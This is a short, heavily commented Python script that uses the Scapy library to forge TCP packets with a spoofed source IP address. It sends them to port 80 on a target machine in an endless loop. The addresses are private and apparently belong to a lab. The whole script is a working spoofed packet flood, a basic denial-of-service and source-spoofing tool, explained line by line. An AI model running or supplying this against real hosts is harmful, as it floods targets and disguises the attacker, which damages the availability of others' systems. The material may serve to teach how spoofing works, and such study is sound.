# Import all necessary modules from the Scapy library
from scapy.all import *

# Define a spoofed source IP address
A = "192.168.5.126"  # The IP address we want to pretend to be sending the packet from (spoofed address)

# Define the destination IP address where the packet will be sent
B = "192.168.5.135"  # The target machine's IP address that we want to send the packet to

# Generate a random source port for the packet
C = RandShort()  # Scapy function to generate a random 16-bit short integer for the source port number

# Define the destination port (80 represents HTTP traffic, typically used for web traffic)
D = 80  # Destination port number (in this case, we are using port 80 for HTTP)

# Define the payload of the packet (the data you want to send in the packet)
payload = "Hello Hello Hello"  # The message or data that will be included in the packet

# Start an infinite loop to keep sending the spoofed packets
while True:
    # Construct the packet
    # `IP()` creates an IP layer with spoofed source and target IP addresses
    # `TCP()` creates a TCP layer with the specified source and destination ports
    # `/` is used to stack layers in Scapy, combining them to form a full packet
    spoofed_packet = IP(src=A, dst=B) / TCP(sport=C, dport=D) / payload
    
    # Send the crafted packet using the `send()` function
    # `send()` transmits the packet over the network
    send(spoofed_packet)
